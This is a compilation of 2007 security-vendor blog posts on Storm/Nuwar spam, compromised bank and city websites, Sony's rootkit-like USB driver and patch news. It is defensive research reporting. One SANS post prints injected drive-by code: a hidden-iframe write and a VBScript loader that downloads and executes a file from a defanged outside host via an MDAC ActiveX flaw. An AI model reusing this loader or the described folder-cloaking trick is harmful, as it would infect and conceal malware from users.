Chris Mosby at myITforum.com

Nuwar/Zhelatin/Storm took a nap

Friday August 31, 2007 at 7:16 am CST
Posted by Dirk Kollberg

Trackback

While monitoring the Nuwar/Zhelatin/Storm network, I noticed the bot stoped sending out emails on Thursday at 9.45pm UTC.

No more postcards? No more Pump&Dump spam? Or just a bug in my setup?

This morning at 7.00am UTC, still not a single mail. But I saw the bot connecting to the Peer-to-Peer network and transfering data - the same way it used to do the last several days.

I gave MessageLabs a call and they confirmed that the number of intercepted emails containing Nuwar related links had diminished considerably in the past few hours.

So it’s not my goat setup behaving different as expected.

Time to party? Unfortunately not - at 10.45am UTC, my system sent me an alert. New mails got captured. Well, at least it took a nap for 13 hours.

Watch out for mails offering videos from either:

Snoop Dog, Beyonce, Hurricane Chris, Emenem, Lil Mama, Heuy, Chris Brown, Eagles, T-Pain, Fergie, R. Kelly, Sean Kingston, Kelly Clarkson, Velvet Revolver, Fat Boy, Akon, Rihanna, Foo Fighters.

For example:

Source: Computer Security Research - McAfee Avert Labs Blog

Compromised Bank Of India Website!

Friday August 31, 2007 at 3:30 am CST
Posted by Nitin Jyoti

Trackback

Our friends from Sunbelt reported the Bank of India website as seriously compromised late last night. The main page of this website had a hidden IFRAME linking to a malicious website hosting multiple exploits. An unsuspecting visitor will end up getting infected if their system is not fully patched.

At McAfee Avert Labs, we come across defacements of Indian websites on a regular basis. This is only the second high profile incident where a popular Indian website was compromised to serve malware. A prior incident took place with the national air carrier’s website AirIndia getting compromised to host malware.

Following is a pictorial representation of how the Bank of India website was found to be linked to malicious sites, this morning (Indian time).

McAfee protects its customers against this threat via script scan. You can read more about this on one of our earlier blogs here. The obfuscated scripts that attempt to exploit users machines are blocked from execution, thereby, nullifying the attack. The script used in this attack was proactively detected as JS/Downloader-AUD.

Following are some of the malware we saw getting downloaded at the time of writing this blog (Credits to Prashanth PR for analysis).

• Spy-Agent.bv.gen
• Proxy-Agent.o
• PWS-Goldun
• PWS-LDPinch
• Generic BackDoor.u
• Generic Downloader.ab
• Generic.dx
• Generic RootKit.a

Update: We made contact with the Bank officials and intimated them about the situation. The site has been cleaned up now

Source: Computer Security Research - McAfee Avert Labs Blog

Vista Patches?

Published: 2007-08-30,
Last Updated: 2007-08-31 06:22:54 UTC
by Mark Hofman (Version: 1)

Some of you will have noticed some vista patches coming through today.

It looks like there are 5 patches, 2 important, 2 recommended and one optional.

 

	KB933360	Daylight Saving Time changes.	Important	28/8/07
	KD939159	resolve an issue in the Background Intelligent Transfer Service (BITS)	Important	28/8/07
	KB938194	This update resolves some compatibility and reliability issues in Windows Vista	Recommended	Today (30/8)
	KB938979	This update resolves some performance and reliability issues in Windows Vista	Recommended	25/8/07
	AMD Patch for ATI	Potential vulnerability in the CATALYST installer component.	Optional	25/8/07

NOTE: The readers are reporting the AMD patch also applies to XP, likewise 933360.

Also a reboot required, but then it would be unusual if it didn't.

A reader (thanks Dan) also mentioned this link http://support.microsoft.com/kb/894199/en-us. which seems to be a good synopsis of the patches deployed.  Might be a good spot to check patch Tuesday stuff.

 

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Sony is awake
Posted by Mikko @ 11:04 GMT

---

Sony Electronics phoned us today. They wanted to thank us for bringing the Microvault incident to their attention, and they also wanted to apologize for not responding to our earlier queries regarding the incident.
We have now opened direct discussion channels with Sony Electronics and are assisting them with the investigation. We have also provided them with our internal investigation notes on the case.
We were also promised a direct contact point for future. Just in case we would again discover a rootkit or something in Sony's products. After all, we have already done it twice...

Source: F-Secure : News from the Lab

Bioshock rootkit rumor shot down

The recent release of the eagerly anticipated Bioshock game lead to gamers getting another kind of shock. Bioshock is a hybrid first-person shooter/RPG from Irrational Games. A rumor had circulated that the Bioshock game comes loaded with a rootkit. After investigation Symantec can confirm that this is not true.

The rumor seems to have started after Microsoft’s RootkitRevealer found a “SecuROM” registry setting that it found suspicious after the Bioshock game had been installed. SecuROM just so happens to be owned by Sony who after all had started the whole rootkit outrage with their music CDs.

The secuROM installation creates a folder and a registry key with a null character which prevents users from accessing/deleting the key from the registry. This is to assist with disc authentication and piracy. It is however not a rootkit.

Posted by Peter Coogan on August 31, 2007 05:00 AM

Source: Symantec Security Response Weblog: Bioshock rootkit rumor shot down

Bank of India's website compromised
Posted by Patrik @ 05:40 GMT

---

Earlier today we saw a blog post from our friends over at Sunbelt about a compromise of Bank of India's website and we checked it out.

On the front page of the site a hidden iframe has indeed been inserted and it loads a URL from another website.

This file in turn uses three iframes to load three other URLs.

Two of the URLs are now down but the third one contains an obfuscated JavaScript that uses exploits to download and run a file called 'loader.exe'. This file is a small downloader which downloads additional files which are different password stealing trojans, additional downloaders etc. We detect all of the malicious files with the latest update.
Update: The malicious iframe has been removed from the front page and it's now safe to visit the site again.

Source: F-Secure : News from the Lab

Analyst's Diary

Active anti-reverse techniques in Javascript

VitalyK
August 31, 2007 | 08:51  GMT

comment

We recently came across a very interesting suspicious web page. The HTML page of course contained malicious code that linked to the Trojan. However, it was a separate HTML page inside the benign one - the authors of the code went against HTML standards, and put in an extra <html></html> container.

What's surprising is that browsers (we checked using Internet Explorer, Firefox and Opera) don't have any problem processing a page like this. On the other hand, who would expect malicious users to observe standards?

However, this isn't the main issue. We're interested in the script that the malicious users integrated into the web page. Of course, the script is designed to make analysis as difficult as possible, using techniques to obfuscate the JavaScript.

The script itself looks more or less like this:

Nothing particularly surprising here - the majority of scripts like this can be decrypted without analysing all the steps taking to manipulate the code. You just have to find the part of the code which prints to the original web page in order to run the payload. And in this case it's the document.write() function:

If we modify this, we can see the decrypted code for the payload. Change document.write(P7E87DE2) to textarea1.innerHTML=P7E87DE2, with textarea1 being the HTML textarea container on the copy of infected page that we deliberately created on a local harddrive. Now we can see what the script does in the textarea field. Which gives us the following:

And it seems that this script doesn't print anything. This is the first impression - but a closer look at the script turns up this string:

What does this mean? It's very simple - this function gets its own code, and transforms it into a 'key' text string which is made up of letters and numbers. Within the function this string is used to generate the payload i.e. what gets entered in the text area depends on the body of the function itself!

As a consequence, if the code is modified in the slightest way, the result generated will be completely different, and may be completely nonsensical - this is what happened on our first attempt. It's a sort of defense mechanism against modifying the body of the JavaScript function. I haven't seen anything like this before in JavaScript - it's pretty smart.

However, it's possible to get round all of this simply by getting the same string from outside the function, assigning the variable q2854da60, which should be contained in the key string, to the result.

If you're an analyst doing this, and you're trying to get the script from inside the encrypted code, then you might suddenly find that when you open a correctly crafted page in order to get the hidden contents of the script, the browser will freeze. I'll just stick my two cents in here, and point out that this is the moment when your computer will get infected.

The construction used by an analyst within the <textarea></textarea> tags is crafted in such a way as to not only infect users' machines, but also to infect the computer of an analyst who's trying to get to the payload code by printing it to textarea! The construction looks like this:

So if the code is placed inside the textarea container, the code will close the textarea tag and add an iframe container - the browser uses this to load an external script which contains the exploit Trojan that infects the system.

This example shows very clearly how virus writers are combating antivirus professionals who want to protect rank and file users. And if a virus analyst makes the smallest error, his or her machine will become infected. And that's one of the reasons that I love my job - because it teaches me that there's no room for error!

Source: Viruslist.com - Analyst's Diary

Nuwar moonlights as a blogger

Thursday August 30, 2007 at 2:55 pm CST
Posted by Allysa Myers

Trackback

It used to be one our many mantras, back in the old days, that virus writers do not have QA departments. That is to say, virus infections can cause very odd, unintended consequences.

How many of you out there remember the Bugbear virus from 2002? It had a very odd side effect that it would send its attachments to network printers, causing them to spew tons of pages of apparent gibberish, as it printed out the contents of its executable attachment.

Nuwar is having a similarly strange effect lately, effectively posting itself to blogs, where people have set their blogs to be updated by email. Kind of a bonus spreading mechanism there, as this doesn’t seem to have been intentional.

At this point the social engineering doesn’t translate real well, as it’s really geared towards the email format. It should stick out pretty distinctly on a person’s blog. Of course the usual advice applies… don’t go clicking on strange links. kthx!!!

Source: Computer Security Research - McAfee Avert Labs Blog

I got a call from the Managing Editor of WindowsSecrets.com last night, letting me know that he had decided to discontinue my column effective immediately. He plans to have one of the other editors combine the same kind of content into their columns.  My last column was published on Aug, 16th 2007

I can't say that I am surprised but it couldn't have happened at a better time.  That small column was beginning to demand more time that it was supposed to when I first signed up for it, and with the book deadlines coming up, it would have been impossible to keep up.

Working for that newsletter was a great opportunity for me, and I enjoyed working with the other editors as they were real professionals and very passionate about what they do.

I wish them all the best in the future.

More Nuwar Woes!

Wednesday August 29, 2007 at 7:03 am CST
Posted by Vinoo Thomas

Trackback

The Nuwar gang are up to no good again. So far we’ve seen a dizzying flurry of malicious ecards, sexy emails, membership themes and YouTube bait over the last couple of weeks from the authors of the Storm worm. The latest spam run calls for beta testers to try out a product in exchange for life time free updates. A sample mail is as follows:

What the unsuspecting user gets in return upon downloading and executing “setup.exe” is more than what they had hoped for! - A copy of the W32/Nuwar worm.

The newest spam run uses plain text instead of HTML formatted emails and the ip addresses listed appear to be re-used across different spam runs. If one were to traverse to the root of the listed url: http://75.70.[Removed].232 we end up with a page showing a YouTube image (Nuwar’s spam theme over the weekend) requesting the user to manually download and execute “video.exe”. More alarmingly, doing a Google search for any of the subjects lines used in the Nuwar YouTube spam run is throwing up legitimate blog sites that appear to be infected with links pointing to a copy of the worm. More on this at SunBelt’s blog.

Sadly the authors of Nuwar can afford to experiment at will, because if an experiment were to fail, the worst that can happen is that one of their spam runs would not be that successful. And these spammers get instant feedback on how successful a spam run was because people continue to click on the bait links. As a result of this user feedback they continue to develop more effective social engineering techniques and improve upon their creations.

If your computer is fully patched, is running an up to date antivirus and firewall solution, it still does not stand a chance against social engineering when a user invites the threat in. Especially since malware can be tweaked and tested until they stay undetected by an antivirus product. McAfee Avert Labs expects the spammers to continue using these types of tactics and it will be imperative that users are educated on how to avoid becoming a victim.

Source: Computer Security Research - McAfee Avert Labs Blog

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: August 29, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS07-047 - Important
* MS07-046 - Critical
* MS07-045 - Critical
* MS07-044 - Critical

Bulletin Information:
=====================

* MS07-047 - Important

- http://www.microsoft.com/technet/security/bulletin/ms07-047.mspx
- Reason for Revision: V1.1 (August 29, 2007): Bulletin revised to correct Registry Key Verification for Windows Media Player 7.1, 9, 10, and 11 on supported editions of Windows 2000 Service Pack 4, Windows Server 2003 Service Pack 1, Windows Server 2003 Service Pack 2, Windows XP Service Pack 2 and x64 Editions.
- Originally posted: August 14, 2007
- Updated: August 29, 2007
- Bulletin Severity Rating: Important
- Version: 1.1

* MS07-046 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx
- Reason for Revision: Bulletin Updated: Additional information has been added to include workarounds for this vulnerability.
- Originally posted: August 14, 2007
- Updated: August 29, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1

* MS07-045 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-045.mspx
- Reason for Revision: Revised to document the functionality change of increasing the limit on cookies from 20 to 50.
- Originally posted: August 14, 2007
- Updated: August 29, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2

* MS07-044 - Critical

- http://www.microsoft.com/technet/security/bulletin/ms07-044.mspx
- Reason for Revision: Bulletin updated to change download link display text for Office components in Affected Software table
- Originally posted: August 14, 2007
- Updated: August 29, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1

August 29, 2007

  Malicious Web site / Malicious Code:   The Bill site compromise

Websense® Security Labs™ has discovered that the official Web site of The Bill, a popular British TV series, has been compromised and laden with malicious JavaScript code meant to infect visitors with a Trojan horse. Fortunately, the malicious code failed to launch due to what appears to be sloppy work by the intruder. The failure occurred because the code that was placed to execute, was improperly placed on the wrong section of the Web site.

We believe that these are the same perpetrators behind three similar compromises of a UN web site, a prominent bank in India and a large industry organization Web site. Websense Security Labs discovered and reported on these incidents earlier.

At this time, the malicious code is still on the Web site. However, Websense users with Websense Web Security Suite are protected from connecting to the sites hosting the malicious payload.

Screenshot of the Web site with its HTML source:

Source: Websense® - Security Labs Alert: The Bill site compromise

Sony's USB Rootkit vs Sony's Music Rootkit
Posted by Mikko @ 14:45 GMT

---

Monday's post disclosed our investigation of Sony's MicroVault USM-F fingerprint reader software. Sony's software installs a driver that creates a hidden folder using rootkit techniques.

This raises the question – while the techniques employed are similar – is this case as bad as the Sony BMG XCP DRM case
(i.e. the music rootkit)?
In a nutshell, the USB case is not as bad as the XCP DRM case. Why? Because…
The user understands that he is installing software, it's on the included CD, and has a standard method of uninstalling that software.
The fingerprint driver does not hide its folder as "deeply" as does the XCP DRM folder. The MicroVault software probably wouldn't hide malware as effectively from (some) real-time antivirus scanners.
The Microvault software does not hide processes or registry keys. XCP DRM did.
It's also trickier to run executables from the hidden directory than with XCP. However, it can be done.
And lastly, there seems to be a use-case: The cloaking is most likely used to protect fingerprint authentication from tampering. Sony is attempting to protect the user's own data. In the DRM case, Sony was attempting to restrict you – the user – from accessing the music on the CD you bought. So their intent was more beneficial to the consumer in this case.
However – this new rootkit (which can still be downloaded from sony.net) can be used by any malware author to hide any folder. We didn't want to go into the details about this in our public postings, but we suppose the cat's out of the bag now that our friends at McAfee blogged about this yesterday. If you simply extract one executable from the package and include it with malware, it will hide that malware's folder, no questions asked.
We still haven't received any kind of response from Sony International. Sony Sweden did however confirm in a public IDG story that the rootkit is indeed part of their software.

Source: F-Secure : News from the Lab

Analyst's Diary

Botnet losing ground

VitalyK
August 29, 2007 | 13:44  GMT

comment

Over the last couple of weeks we've been closely following the behaviour of a botnet with a C&C (command and control) center based on a popular web-based engine.

We waited for it to grow (see previous posts) and it was interesting to see the increase in the number of infected machines. And now the scale of the botnet is shrinking.

Today the botnet was made up of 6000 zombies, even though a week and a half ago there were more than 14 000! What happened? We took a look and found that there's a significant difference between the total number of infections and actual number of infected machines.

Let's take a look at the zombie network stats that we got today:

Subtract "GENERAL NUMBER BOTS" from "GENERAL NUMBER OF INFECTIONS" and there's a difference of about 10 000. This means the botnet is losing its bots!

Now let's compare the very same stats with the ones that we captured while the botnet was still growing:

The difference between "GENERAL NUMBER OF INFECTIONS" and "GENERAL NUMBER BOTS" is less than 500!

These differences are explained by the fact that AV companies have been busy detecting malicious files which were used to create the botnet. The time taken before all AV vendors detected the files was several days. During this time bots were detected and removed from PCs and this is why the botnet is losing its clients. And every day, as more and more users update their AV databases the botnet continues to lose ground...

Source: Viruslist.com - Analyst's Diary

Hide me Sony one more time!

Tuesday August 28, 2007 at 11:49 am CST
Posted by Aditya Kapoor, Seth Purdy

Trackback

File this one under “Déjà vu all over again”. After learning from F-Secure of shady rootkit-like activities noticed in the software packaged with several Sony USB drives, we were first a bit amazed. After all that had occurred with the audio CD episode, could this really be true? Well, it was.

In the class of nasty rootkits the ones that top the chart are those that use blended techniques to hide or protect themselves. I/O request packet filtering is one kernel mode rootkit technique that is gaining popularity along with the already common SDT hooking.

Sony’s microvault USB media ‘Fingerprint Access’ software uses programs and device drivers developed by Fineart Technology Co. Ltd.. The Fineart device driver installs as a file-system filter driver on top of the existing driver stack. It also hooks the Service Descriptor Table in order to hook NtEnumerateKey. After establishing this, all file system information is filtered through this new device driver and thus it can easily hide any directory or file. Following is a snapshot of windbg showing the device stack.

Figure 1 - \Driver\FG adds itself on top of the driver stack for file system IO.

The apparent intent was to cloak sensitive files related to the fingerprint verification feature included on the USB drives. However, in this case (*cough* AGAIN! *cough*) the authors apparently did not keep the security implications in mind. The executable can be placed in potentially any directory and when executed will subsequently hide all the folders and files within that directory!

As a test we placed the binary in %windir%. Upon launch all the files and subdirectories including system32 were indeed hidden. None of the resources within the directories were accessible anymore. We could no longer run simple utilities like ‘regedit’ or ‘notepad’ or ‘cmd’ using the Run dialog box in start menu, as the path was not resolved due to cloaking. Although one could still access the files using fully qualified paths. Fortunately the executable by itself does not add an entry to the registry Run key or establish any other startup method, so the hidden objects are accessible again upon reboot. However the device driver component is loaded into memory after reboot, so at that stage it is a simple matter of re-executing the binary to hide directories and files:

The publisher may argue that the default installation path is %windir%\[some directory], but that does nothing to stop malware authors from copying the binary to an arbitrary directory of their choice and executing it in that location. Alternately they could simply hide their malicious creations in the default installation directory itself. Another easy hack for malware authors would be to launch the binary from their chosen directory and add a startup entry for the software to ensure it is hidden immediately on boot-up.

Here is the snapshot of VirusScan in action. VirusScan detects the device driver s HideVault!sys and removes it to disable any potential cloaking upon reboot.

Sadly, it appears that expediency of function has again trumped forethought of consequences in one of Sony’s creations.

Source: Computer Security Research - McAfee Avert Labs Blog

ATI’s penicillin to PurplePill and the PatchGuard patch that wasn’t

Here is a short update to bring this latest chapter in Vista’s security fairytale finally to a close.

On Monday the 13th of August, ATI patched their Catalyst drivers to resolve the vulnerability that PurplePill exploited. ATI should be commended with the speed and agility they responded to the issue, although one has to wonder if Microsoft had a hand in this.

It’s still not clear on how they are going to deal with the distribution of this update (there's some conjecture around using Windows Update) and revocation of the old driver. Patching it is one thing, but they can’t leave the old driver floating round indefinitely - or can they? So anyway, along with patch Tuesday came an update to PatchGuard; it’s not clear what extra “resilience” is added in this driver, but could this be designed to complicate exploiting vulnerabilities such as those in the ATI driver? Well it’s not clear currently – it would be logical for Microsoft to continually update PatchGuard to obfuscate, misdirect and complicate exploitation by protecting more key kernel structures while adjusting how the kernel implements PatchGuard protection.

So, with the ATI vulnerability closed and Microsoft’s recent improvements to PatchGuard - which seems slightly confused on whether it’s a security update or not - we’ll have to wait for the next driver vulnerability to be found. Plus, while we’re discussing the PatchGuard patch, why doesn’t Microsoft consider that it addresses a security vulnerability? Well, if we look at the advisory we can see they state:

“While this update adds additional checks to the Kernel Patch Protection system, it does not involve a security vulnerability. Known methods that allow the kernel to be patched on systems where Kernel Patch Protection is enabled require a system to already be compromised by an attacker.”

Alright then! But improvements are good and, well, making PatchGuard harder to subvert is always a good thing.

Until next time…

Posted by Ollie Whitehouse on August 24, 2007 12:24 PM

Source: Symantec Security Response Weblog: ATI’s penicillin to PurplePill and the PatchGuard patch that wasn’t

VMWare Workstation vstor-ws60.sys Denial of Service

Secunia Advisory:
SA26606

Release Date:
2007-08-28

Critical:

Not critical

Impact:
DoS

Where:
Local system

Solution Status:
Unpatched

Software:
VMware Workstation 6.x

Description:
seppi has reported a vulnerability in VMWare Workstation, which can be exploited by malicious, local users to cause a DoS (Denial of Service).

The vulnerability is caused due to the improper validation of userspace parameters within the "FsSetVolumeInformation" IOCTL handler in vstor-ws60.sys. This can be exploited to crash the vulnerable system by sending a "FsSetVolumeInformation" IOCTL with a subcode equal to "FsSetFileInformation", containing an invalid, small size for the file buffer (1024 bytes under the actual size).

The vulnerability is reported in version 6.0. Other versions may also be affected.

NOTE: A crash is confirmed in the "vstor2-ws60.sys" driver from VMWare Workstation version 6.0 while performing standard "DC2" tests.

Solution:
Restrict access to trusted users only.

Provided and/or discovered by:
seppi

Source: VMWare Workstation vstor-ws60.sys Denial of Service - Advisories - Secunia

Non-malicious compromise pointing to a benign VBScript!

Published: 2007-08-28,
Last Updated: 2007-08-28 10:18:07 UTC
by Maarten Van Horenbeeck (Version: 2)

Note: please tread carefully here. While we've obfuscated all malicious links, some of them are still live on the internet. Over the weekend we have been working with anti-virus vendors as well as the regional CERT team to have the issue resolved, but we haven't been quite as succesful as we've hoped. This attack doesn't merely apply to the site mentioned, but spreads out over hundreds of compromised sites - so you may feel like filtering the malicious URL mentioned.

At least if you believe everything your neighborhood webmaster tells you... Early last week, the forum of the website of Leuven, a major student town in Belgium, got compromised. National press reported the compromise occurred through so-called SQL infection (sic), after which links to a .cn web server were added. In an interview, an IT representative of the local government stated that the "hack was not malicious. No data on the website was removed, altered or stolen".

Reason enough for the Internet Storm Center to have a second look. Apparently several pages on the forum were altered to contain a script tag to:

hxxp://www xvgaoke.cn /ms/ltxs.js

 

This Javascript routes you to another page using a hidden iframe:

document.write("<ifra me width='0' height='0' src='hxxp ://www xvgaoke. cn/ms/ltxs.htm'></ifra me>");

 

The resulting page contains a piece of VBScript (reduced in size below for brevity), a hyperlink to Google and a counter hosted on a Chinese web server.

 

abc = "006F006E0020006500720072006F0072...65006E0022002C0030000D000A"

cde = "006F006E0020006500720072006F007...00065006E0022002C0030000D000A"

Function decode(x)

For i = 1 To Len(x) Step 4

If Mid(x, i, 4) = "0D0A" Then

decode = decode & vbCrLf

Else

decode = decode & Chr(Int("&H" & Mid(x, i, 4)))

End If

Next

End Function

execute (decode(abc))

execute (decode(cde))

 

 Naturally, we want to have a look at what this code does. It's easy to execute VBScripts on the desktop using the Windows Script Host, or WSH, and its tool wscript. The content can just be copied into a vbs file and executed. However, that's not what we want to do here, since the script says EXECUTE. Not a good idea.

 So, let's change these commands around a bit. Wscript contains a function that allows you to echo content to the screen in a message box:

wscript.echo (decode(abc))

wscript.echo (decode(cde))

 

Executing the script through wscript then results in some more VBScript which includes the following code:

 

on error resume next

m1="object"

m2="classid"

m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

m4="Microsoft.XMLHTTP"

m5="Shell.Application"

MircoLong="hxxp:// www xvgaoke. cn/ms/ltxs.vbs"

…

set MircoLonge=MircoLongc.createobject(m5,"")

MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0

 

We can see a reference to BD96C556-65A3-11D0-983A-00C04FC29E36. This is the CLSID for a Microsoft Data Access component (MDAC). On April 12th, 2006, a Microsoft advisory reported on a significant vulnerability in an ActiveX control part of the ActiveX Data Objects (ADO), referenced in the exploit code above. Today still, this vulnerability is commonly exploited as part of so-called drive by exploits.

 

Without being noticed, the code then downloads ltts.exe from the same server and executes it on the victim system. On August 25th, the malware had a SHA1 hash of c1cbee89ba1033b8e739067eab086f70b476c5aa and was about 50 kb in size. Five days after the compromise took place, the binary was detected by 9 out of 32 anti-virus solutions. Note that it’s quite common for people running such malicious web server to change their malcode every so often as to reduce the risk of getting detected by anti-virus.

 

Once run on a system, the software drops a number of executables and installs one of them as a userinit value under the winlogon process. This makes for one of those pesty-difficult-to-remove pieces of spyware. In the end its final goal appears to be the gathering of World of Warcraft authentication credentials.

 

If you're still wondering why these are so prized, run this small google query. On-line games have recently seen the rise of so-called Real Money Transactions - yes, real money you can lose by getting compromised and others can gain. Blizzard, the WoW developer, strongly discourages this practice, but something of value to a player can always be sold on other markets.

So this leaves me wondering why exactly this was a non-malicious compromise ?

--
Maarten Van Horenbeeck

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

That made up my mind, I am not buying this game... 

Digital Reality Misunderstanding

Friday August 24, 2007 at 10:36 am CST
Posted by Seth Purdy

Trackback

The Tuesday release of the much anticipated computer game BioShock has quickly turned up another clash between enthusiastic customers and the interests of publishers and copyright control. Reports indicate that the PC versions of the game, whether purchased on physical DVD media or via the Steam online distribution service, utilize a DRM scheme that limits the number of installations possible with a given license key. The apparent limit of two (due to customer uproar it appears this number is being raised to five) installations per license poses hurdles for users facing frequent system upgrades or recovery from system failures.

Interestingly, content owners and publishers face the same fundamental conundrum in implementing DRM as malware writers do in attempting to encrypt or otherwise obfuscate the code of their creations. The crux of it is this: If, in the end, you need to actually run code or play media content, there will necessarily be a time at which it runs in the original, unprotected form.

For the DRM case, let’s take commercial movies as an example. The data on DVDs, HD-DVDs, and Blu-ray discs is encrypted. But, ultimately you need to get the original unencrypted data onto a display device. There’s simply no way around it. The player itself handles the initial decryption. Setting aside the flaws uncovered in the CSS and, more recently, AACS implementations, that was generally sufficient until purely digital displays and connections became more prevalent. At that point there was a risk of perfect digital duplication by simply sampling the unencrypted output from a player. HDCP is a clever attempt to plug that hole. It establishes an encrypted link between the player and display, moving the point at which the digital data is in it’s “raw” unprotected state as close as possible to the final output stage (within the processing electronics of display itself), thus making digital duplication of the unprotected content more difficult. But still, the final unencrypted data has to be produced on the customer’s equipment for viewing. As such, an HDCP-compliant device could be constructed to gain access to that data and copy it.

In the case of BioShock it’s not raw media content being decrypted and displayed, but the act of allowing the game to run. At some point, after whatever checks or validation schemes are used, the customer needs to be able to actually play the game. As long as that path leads to the eventual successful launch of the game (all the data and resources needed for it to run are already on the system once it’s installed), it is possible to find a way to circumvent it and cut the DRM controls out of the picture.

Malware writers face a similar challenge when trying to obscure the code of their creations from security software using packers or encryption. Try as they might, they can’t get around the hard fact that they ultimately need to execute their original unobfuscated machine code. To do that, it has to exist in that state on the system at some point, even if as only one instruction at a time in memory. And since that’s true, we’ll always have a basic opportunity to get at it (though this is more difficult in some cases than in others).

Although the copyright lawyers may wish it otherwise, it’s a zero-sum game between usability and control. The only way to absolutely ensure that publicly distributed media content won’t be pirated, software won’t be run in an unauthorized way, or native code be accessed and identified is to encrypt the entire thing using a very strong algorithm with a highly random key, and then delete or never reveal that key to anyone. Did I say “absolutely”? That’s not quite right. The encryption algorithm or key chosen may have an unknown weakness that could later be revealed, so the only guaranteed solution is not to release the data at all! Of course, for a commercial product that would present a bit of a challenge for the marketing department (digital Cheese Shop, anyone?) and in the case of a malware executable would render it similarly useless to the author.

Unfortunately, in the case of DRM’s trying to strike a balance between some degree of control and maintaining the ability of the software or media to operate can often end up inconveniencing and angering legitimate users. Pirates, on the other hand, will happily exploit this fundamental flaw of the situation as they develop software cracks and duplication methods to circumvent the protection.

However, in the case of security software versus malware obfuscation that same flaw ensures there will always be at least one *** in the armor for us to work on when we tackle the latest virus or Trojan.

Source: Computer Security Research - McAfee Avert Labs Blog

Latest Nuwar Spamming Uses YouTube Lure

Monday August 27, 2007 at 6:00 am CST
Posted by Vinoo Thomas

Trackback

McAfee Avert Labs has observed a new trend in W32/Nuwar spamming over the weekend. The authors of this malware have resorted to spamming HTML formatted emails that pretend to be from a friend sending a link to a video from YouTube. A copy of the spammed email is as follows:

To the average computer user, the link in the email would seem perfectly legitimate as it points to youtube.com but if one were to hover the mouse over the URL, it would point to a numeric ip address. This is achieved by using special HTML anchor tags in order to obfuscate the malicious URL so that what the victim sees is usually not what they get. As if forecasting the Nuwar author’s next move, McAfee Avert Labs had recently blogged about the risks of using HTML formatted email.

For users who fall for this bait and click the link, they are directed to a site containing an image, tagging back to YouTube’s logo.

In the background an embedded obfuscated JavaScript routine that attempts a cocktail of browser and application exploits is executed. If successful, the user’s machine gets infected with a copy of W32/Nuwar. If the exploits fails to run on a fully patched machine, the malware author has used clever wordings on the webpage in order to entice users to manually download and launch the virus via good old social engineering.

With so much thought and creativity going into keeping the W32/Nuwar juggernaut rolling, it will be interesting to see how the field plays out. Remember for every counter measure, there is a counter-counter measure. We only lose if we stand still. And what would be the fun in that?

Source: Computer Security Research - McAfee Avert Labs Blog

Let the clock start ticking.... 

News Flash - System Center Configuration Manager 2007 has left the building!!!

OMG – Anderson’s not dead! Look – a blog entry! Wow – how time flies. It seems like only yesterday that Brady/I were on stage at MMS, basking in the glow that was the release of SMS 2003. (I think the actual quote he used was, “wow – we should ship a product that works more often” J). Ah, those were the days. We could stand in front of a room, announce we removed logon points, and get applause! Ah, the simple life… Today is the next in that line of milestones. At 4PM today 8/24, the team signed off on System Center Configuration Manager 2007 (still can’t get used to that name!) and we’ve officially released it to manufacturing. What this team is delivering to you is the most SIGNIFICANT release in the 13 year history of the product, and I’m so proud to have been a part (albeit small as I’ve been working on SCCM V5 for a year now!) of the past 3+ yrs of work that has gone into it. It’s significant for so many things. Sure – it’s got a TON of features and functionality that we hope will help you all continue to “do more with less”, “stay TechSexy” or whatever those slogans have said in the past! But it’s so much more than that. It’s about massive investments in making sure the quality is at the point so that you can bet your business on our ability to deliver. We made a quality mistake with you guys 8 years ago, and promised you it would never happen again. We continue with that promise.  (I'll put out test stats in the next few days that will blow your mind!).  It’s about significant time in understanding how you’ll upgrade between versions, because we know that the deployment of an enterprise systems mgmt tool is not a “next, next, next, finish (and then reboot)” activity. If you’d like, we COULD bring back “express setup” and it could be that fast! It’s about a commitment to you on schedule. We set an internal schedule 2 years ago that had a bottoms-up RTM date of August, 2007. We HIT that. We know you guys (and gals April et al!) bet your tech strategies on our ability to get you a product in the right time window. We take a lot of pride in being able to deliver that for you. But, most importantly – it’s about you – the 50,000 (ballpark) SMS customers and admins around the globe that continue to support us, continue to beat us up when we don’t get you what you need, continue to add/extend on top of this product we provide, continue to find new business problems to solve with SMS, continue to fight battles with network and security admins to get this product installed right, continue to delight end-users by giving them services w/o them even knowing, continue to evangelize this product to your peers, continue to do what we tell you not to do (edit site control file, work direct to the database, etc), and continue to not only be our customers, but be our peers and friends. Wish you guys could all be here to share with us in this celebration (now THAT would be a party) but a lot of us will be on the road in the upcoming weeks. There is an event in Boston on 10/4, and a few of us (tough life!) will be gallivanting around Europe for MMS Best of Europe road show, culminating in our worldwide launch in Barcelona at IT Forum (yes – that other IT Forum thing!). You’ll be seeing updates on ms.com with stuff about SCCM 07 early next week – but I couldn’t wait that long to tell you how much we appreciate all your help in making this happen, and how we know that the battle isn’t over – it’s only begun – as we work together to get you guys deploying this product in the upcoming months!

Bill Anderson
Lead Program Manager
System Center Configuration Manager
Microsoft Corporation

Source: News Flash - System Center Configuration Manager 2007 has left the building!!! - The Anderson's Blog!

Double Whammy! Another Sony Case (And it's Not BioShock)
Posted by Mika @ 10:58 GMT

---

Biometrics – yes. BioShock – no.
Hypothetical: Imagine that you visit your local mall and browse around for stuff to buy. And you decide to buy a new CD from your favorite artist and you also buy a brand new cool USB stick thingy on an impulse. You go home and stick the CD into your laptop's CD drive. It prompts you to install some software. You do so and while you are listening to the music, you open the USB stick package and start experimenting with your new toy. It has a fingerprint reader so you install the software for that as well. Guess what… you might have just installed, not one, but two different rootkit-like software on your laptop.
We received a report that our F-Secure DeepGuard HIPS system was warning about a USB stick software driver. The USB stick in question has a built-in fingerprint reader. The case seemed unusual so we ordered a couple of USB sticks with fingerprint authentication. We installed the software on a test machine and were quite surprised to see that after installation our F-Secure BlackLight rootkit detector was reporting hidden files on the system.

